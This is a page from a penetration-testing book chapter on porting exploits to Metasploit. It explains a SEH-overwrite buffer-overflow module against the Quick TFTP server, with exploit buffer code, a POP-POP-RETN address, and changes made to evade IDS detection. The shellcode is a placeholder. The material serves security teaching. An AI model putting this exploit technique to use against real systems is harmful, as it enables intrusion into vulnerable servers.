Porting Exploits to the Metasploit Framework
229
sploit = "\x00\x02"
sploit << "pwnd"
sploit << "\x00"
sploit << evil
sploit << "\x00"
udp_sock.put(sploit)
disconnect_udp
end
Following the initial string of
A
s (1019 of them, represented by
\x41
in hexa-
decimal), we add a short jump at to overwrite the Next SE Handler (NSEH).
At the beginning of this chapter, we used a simple stack overflow example when
we attacked MailCarrier and overwrote the instruction pointer. Here, we over-
write the SEH and the NSEH to break out of the structured exception handler.
Then at we add the address of a
POP-POP-RETN
sequence of instructions to
overwrite SEH, which puts us into an area of memory that we control.
Next, to make sure that the packet will be recognized as a write request
by the TFTP server, we append
\x00\x02
after the shellcode at .
Now, when we load the module and run it against our target, our debugger
should pause with a SEH overwrite, as shown in Figure 15-4.
Figure 15-4: Quick TFTP's initial SEH overwrite
Because that long string of
A
s and the NOP slide sent to the application
will set off IDS alarms, we’ll replace the
A
s (as in the previous example) with
a random selection of uppercase alphabetic characters, and replace the
\x90
characters with NOP equivalents, as shown in the following boldface code:
evil =
rand_text_alpha_upper(1019
) # Was: "\x41" * 1019
evil << "\xeb\x08\x90\x90" # Short Jump
evil << "\x58\x14\xd3\x74" # pop/pop/ret
evil <<
make_nops(16)
# Was: "\x90" * 16 # NOP slide
evil << "\xcc" * 412 # Dummy Shellcode
As always, it’s a good idea to check your new module’s functionality after
every change. As you can see in Figure 15-5, the random characters have been
accepted by the application and SEH is still controlled as it was before.